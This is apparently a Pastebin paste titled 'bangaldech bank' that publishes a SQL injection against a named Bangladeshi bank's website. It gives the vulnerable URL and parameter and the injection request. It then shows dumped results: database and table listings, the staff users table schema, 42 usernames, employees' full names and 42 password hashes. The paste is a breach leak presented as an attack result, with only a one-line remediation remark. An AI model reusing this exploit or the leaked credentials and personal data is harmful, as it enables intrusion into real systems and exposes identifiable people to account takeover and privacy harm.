API tools faq
paste
human_mind_cracker

bangaldech bank

human_mind_cracker
Oct 25th, 2012
220
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.26 KB | None | 0 0
raw download clone embed print report
  1. {*]SQL Injection:
  2.  
  3. SQL Injection (SQLI) is a code injection technique that exploits a security vulnerability occurring in the database layer of a web application. The vulnerability was present when user input was either incorrectly filtered for string literal escape characters embedded in SQL statements or user input was not strongly typed and thereby unexpectedly executed.
  4.  
  5. solution: Sanitize all user-supplied data before using it as part of database queries.
  6.  
  7. database: MySQL
  8.  
  9. request:
  10.  
  11. GET http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID='%60%22XrojS HTTP/1.1
  12. database: MySQL
  13.  
  14. [*]Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
  15.  
  16.  
  17.  
  18. available databases [2]:
  19. [*] information_schema
  20. [*] islamidb
  21.  
  22. Database: islamidb
  23. [74 tables]
  24. +--------------------------+
  25. | annualreport |
  26. | ar_cat |
  27. | area |
  28. | articles |
  29. | atm |
  30. | atm_area |
  31. | atm_location |
  32. | audit_committee |
  33. | board_of_directors |
  34. | books |
  35. | branchdtls |
  36. | branches |
  37. | chairman_corner |
  38. | charge_commision |
  39. | corporate_info |
  40. | currencyrate |
  41. | currencyrate0 |
  42. | deposit_scheme |
  43. | deposit_scheme_info |
  44. | dept |
  45. | disclosure |
  46. | district |
  47. | download |
  48. | dynamicsections |
  49. | email |
  50. | eventdetails |
  51. | eventdetails_11 |
  52. | eventdetails_111 |
  53. | events |
  54. | executive_committee |
  55. | feb_aof_info |
  56. | feb_crsp_info |
  57. | feb_csc_info |
  58. | feb_nrb_info |
  59. | feb_rema_info |
  60. | feb_repa_info |
  61. | fex_graph |
  62. | interview |
  63. | investment |
  64. | jobcategory |
  65. | jobdetails |
  66. | keypersonal |
  67. | link |
  68. | link_cat |
  69. | management |
  70. | managementdetails |
  71. | manager_info |
  72. | md_corner |
  73. | md_news |
  74. | md_publication |
  75. | news |
  76. | notice |
  77. | orderby |
  78. | orderplacement |
  79. | paidup_capital |
  80. | personnel |
  81. | photo_album |
  82. | price_sensative_headline |
  83. | privilege |
  84. | profit_rate |
  85. | publication |
  86. | qryjobs |
  87. | rds_perform_details |
  88. | rds_perform_heading |
  89. | shariahcouncil |
  90. | shariahdetails |
  91. | sme_info |
  92. | sme_prd_info |
  93. | sme_zone |
  94. | sponsors |
  95. | sysvalues |
  96. | userrights |
  97. | users |
  98. | video |
  99. +--------------------------+
  100.  
  101. Database: islamidb
  102. Table: users
  103. [13 columns]
  104. +-------------+--------------+
  105. | Column | Type |
  106. +-------------+--------------+
  107. | Address | varchar(50) |
  108. | BranchName | varchar(50) |
  109. | Depertment | varchar(50) |
  110. | Designation | varchar(50) |
  111. | Email | varchar(50) |
  112. | FullName | varchar(50) |
  113. | IsActive | tinyint(4) |
  114. | Mobile | varchar(50) |
  115. | Password | varchar(255) |
  116. | Phone | varchar(50) |
  117. | UserID | int(11) |
  118. | UserName | varchar(50) |
  119. | UserType | char(1) |
  120. +-------------+--------------+
  121.  
  122. Database: islamidb
  123. Table: users
  124. [42 entries]
  125. +------------------+
  126. | UserName |
  127. +------------------+
  128. | atmadmin |
  129. | atmimran |
  130. | bcdadmin |
  131. | bcdraquib |
  132. | borhan |
  133. | bpmdadmin |
  134. | bpmdnizam |
  135. | bpmdsaiful |
  136. | bsadmin |
  137. | bsahashan |
  138. | bsfoysal |
  139. | chairmanadmin |
  140. | chairmanuser |
  141. | dsd |
  142. | ecsdadmin |
  143. | ecsdjahangir |
  144. | fadadmin |
  145. | fadshaheduzzaman |
  146. | hrdabrar |
  147. | hrdadmin |
  148. | hrdahsan |
  149. | hrdmaquddus |
  150. | ibwadmin |
  151. | ibwmonir |
  152. | ictdwebadmin |
  153. | khademibw |
  154. | mdsadmin |
  155. | mdsmohtasim |
  156. | mkamal |
  157. | prdadmin |
  158. | prdhumayan |
  159. | rcidadmin |
  160. | rddadmin |
  161. | rddmashiul |
  162. | rddthohid |
  163. | rdsadmin |
  164. | rdsuser |
  165. | shaheduzzaman |
  166. | shareadmin |
  167. | sharerozaer |
  168. | shariahadmin |
  169. | shariahhabib |
  170. +------------------+
  171.  
  172.  
  173. Database: islamidb
  174. Table: users
  175. [42 entries]
  176. +-------------------------------+
  177. | FullName |
  178. +-------------------------------+
  179. | Admin of HRD |
  180. | Ahsan Habib |
  181. | Habibur Rahman |
  182. | Humayan Rashid |
  183. | Imran |
  184. | Ismail |
  185. | Jahangir Hossain |
  186. | Md. Atiqur Rahman khan Khadem |
  187. | Md. Borhan Uddin |
  188. | Md. Mashiul Alam |
  189. | Md. Mostofa Kamal |
  190. | Mohammd Thohidul Islam |
  191. | Muhammad Abdul Quddus |
  192. | Omar Foysal |
  193. | Qazi Mohammed Shamsul Abrar |
  194. | Rozaer Hossain |
  195. | S M Abdur Raquib |
  196. | Saiful Islam |
  197. | Shaheduzzaman |
  198. | Super Admin |
  199. |_______________________________
  200.  
  201.  
  202. Database: islamidb
  203. Table: users
  204. [42 entries]
  205. +----------------------------------+
  206. | Password |
  207. +----------------------------------+
  208. | 01e8565004e20ebaaee5d1e948cc0f03 |
  209. | 04dcef1b1d1ffff2a2c1f6f31e42348a |
  210. | 0d308e5cfbb51143225b884c2d56167e |
  211. | 0ed377bde3c3a6a3b3c9b8f49c81bcac |
  212. | 119cbed0296edd3415f73ca21d695eb4 |
  213. | 13cf6dd79b3e7d7d398f11a567a0a1b5 |
  214. | 178b0c400e3cbc03418ee64e7af71b6e |
  215. | 2651cea9b74c51aacdbcc1396ce5bfb7 |
  216. | 3d3993a6ece38d0c10b155d5facf78e7 |
  217. | 3eeb8d98c5dba5919eaed3f93bc317e6 |
  218. | 3fb85c9f03577600bc8ba6e2e25a44d5 |
  219. | 46f1eeae56bdf1077e1890cf8c8384a3 |
  220. | 48cda072801bb304a08aaa19cae8ece6 |
  221. | 4c1f0b5771136bf504f8d72144fc0972 |
  222. | 5135cebb53ab8a028f9d16d48ca9f5f5 |
  223. | 6013ee7dc437d4b10b211110ebeb5dc4 |
  224. | 639aa761eb8cdaaf132c98460c3a92be |
  225. | 641e4550176313cfcb7004dc6657c54c |
  226. | 731c4cece807f681524eeb3c00c075c8 |
  227. | 738a639acd1502c515d2ba9a980162e8 |
  228. | 7e242f8c51fdb0b1a754bcdec21d0532 |
  229. | 806938e17a140d0a2847c6d4a7e88e8c |
  230. | 8336f298fed5901d2c58c4c3a0be0522 |
  231. | 86d7ffa824672126bd183a8961d95a1e |
  232. | 8e099fb1fd7804e63e29ca180853f1a3 |
  233. | 9e044b89f318c8848d18ad0f8a64d309 |
  234. | 9f6b071e1e1c75a380a99972fd1d6c87 |
  235. | a06ea6415499e6fc813cdb756da9fdb6 |
  236. | b31d1d300bd4d9438a59169c08535682 |
  237. | bd06b23acb9d8f84149500333cc1c7cc |
  238. | bd596577eefdf3a60b314512035d7de8 |
  239. | bed407e0a32fdd46b71722c11991d9c3 |
  240. | cca35a0265721f5ab431821a745056af |
  241. | d6dec0fde9d68bb607d25b84d45059f0 |
  242. | da1f2fbf9b96c7160869c785b8de4bd6 |
  243. | da7c5f47b4c492545aa55ec5887989a1 |
  244. | db502e13cc0ad9b22440223c095bcdaf |
  245. | e2e796c8d2f15e6eeae1498e063996d1 |
  246. | ecdc03a40c52f1a387cb44ddf5740e5d |
  247. | f099cd5a70853ec7de964fdbb7027bb9 |
  248. | f28d90f403abe8c509aca6bd73930e8f |
  249. | f3c94f7cece18ac86ede31265f24a2e7 |
  250. +----------------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!